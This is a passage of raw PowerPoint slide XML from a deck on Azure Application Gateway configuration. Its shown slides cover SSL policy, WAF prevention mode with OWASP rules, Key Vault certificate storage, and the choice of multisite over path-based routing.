        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87503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2C554F-7302-F475-6EA9-C582FE73E1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Do use latest recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84D2D70-00CF-40E1-15A0-62A991437A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Strongly recommended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply SSL policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strip response Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable WAF prevention mode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with latest OWASP rule set</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If required by regulations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ð"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put the certificate in an Azure Key Vault </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D9957A-13E9-35ED-8831-18C96287E3B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62820" y="3531140"/>
            <a:ext cx="5457744" cy="2343619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0838C72E-5C5C-0ADB-51DE-72ABF3465F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125184" y="5874759"/>
            <a:ext cx="5208556" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/de-de/azure/application-gateway/configure-web-app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1262234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4C0AEA-678A-1669-1BA6-793E866DD845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Why to put the certificate in a Key Vault?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437B9FF8-FD60-2BCC-986E-E51143A36C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="1916349"/>
            <a:ext cx="8863260" cy="4370151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Gateway integration with Key Vault offers many benefits, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stronger security, because TLS/SSL certificates aren't directly handled by the application development team. Integration allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>a separate security team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up application gateways.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control application gateway lifecycles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grant permissions to selected application gateways to access certificates that are stored in your Key Vault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for importing existing certificates into your Key Vault. Or use Key Vault APIs to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>create and manage new certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with any of the trusted Key Vault partners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>automatic renewal of certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that are stored in your Key Vault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C2C605-D09F-3043-29B2-8A6A5209BD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97981" y="3429000"/>
            <a:ext cx="825837" cy="825837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AB1A16-8249-B88A-0707-969565A5A7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54755" y="2036562"/>
            <a:ext cx="667504" cy="667504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Pfeil: nach unten 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE229BF-FEDA-44FA-F411-539B340593C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10895542" y="2785441"/>
            <a:ext cx="230717" cy="4679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Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736612DB-8576-3FCD-5604-54D181BE6409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6286500"/>
            <a:ext cx="6094378" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/key-vault-certs</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3451558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Inhaltsplatzhalter 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9AC752-134F-437F-0FB3-99E1C31EA536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758953" y="2440568"/>
            <a:ext cx="5164738" cy="3801284"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9F9158-4F61-31B1-C641-678F6AD8923E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> Routing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Use Multisite Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Inhaltsplatzhalter 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8EA31E-298F-16A8-544E-308736D0B810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2440568"/>
            <a:ext cx="5164738" cy="3801283"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Multisite Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E11277-DB34-711E-73A2-CD7194FFB9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05303" y="4129716"/>
            <a:ext cx="691357" cy="691357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Verbinder: gewinkelt 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAD3E9C-B9CB-70A1-EC35-E1F590F5508A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855010" y="3307995"/>
            <a:ext cx="2350293" cy="1167400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9154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Verbinder: gewinkelt 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62A44D1-BBD7-B754-AD3C-2CDA9FDE8500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="855010" y="4475395"/>
            <a:ext cx="2350293" cy="1188153"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9154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AAD68C05-EF09-9693-BBB5-3B6286801E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855010" y="4473678"/>
            <a:ext cx="2350293" cy="17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49" name="Grafik 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4517C567-E60B-8721-43DD-B8CD22496C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31710" y="3069393"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Grafik 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68A1C52-AF3C-ABD5-77DD-32D7B5A1B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31710" y="4236777"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Grafik 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB04EC6-DC97-E7A8-F211-043065998C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31710" y="5404161"/>
            <a:ext cx="477204" cy="477204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Verbinder: gewinkelt 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE582FA-80F5-C482-D9FF-202C6A307C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="51" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3896660" y="4475395"/>
            <a:ext cx="1035050" cy="1167368"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 996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Verbinder: gewinkelt 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DA5102-CF50-E41E-4B89-77E7819E0653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3896660" y="3307995"/>
            <a:ext cx="1035050" cy="1167400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 996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id="{DF9F80E7-3239-16F8-6F35-F58D0A8D19C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="50" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3896660" y="4475379"/>
            <a:ext cx="1035050" cy="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2" name="Textfeld 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459716F2-00C9-2226-232F-8A805E7E9240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826129" y="3466083"/>
            <a:ext cx="688367" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Textfeld 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6274EE-59A0-AFDC-4F5A-F5D3CA2E98CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826129" y="4646805"/>
            <a:ext cx="712053" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Textfeld 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32DBE309-C4A4-CC5A-1C8E-048E35E804B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826129" y="5838547"/>
            <a:ext cx="712054" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shop</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Textfeld 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6652A73-2132-FBD6-91FB-1E84DE7F7515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758953" y="3040047"/>
            <a:ext cx="2350293" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://contoso.com/api</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Textfeld 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B65977B-6974-0A8B-EFB9-4FD13DA59567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776979" y="4196679"/>
            <a:ext cx="2051051" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>https://contoso.com/app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Textfeld 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82289C4-9EDC-B430-9142-D32F06AF867C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776979" y="5386549"/>
            <a:ext cx="2089308" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
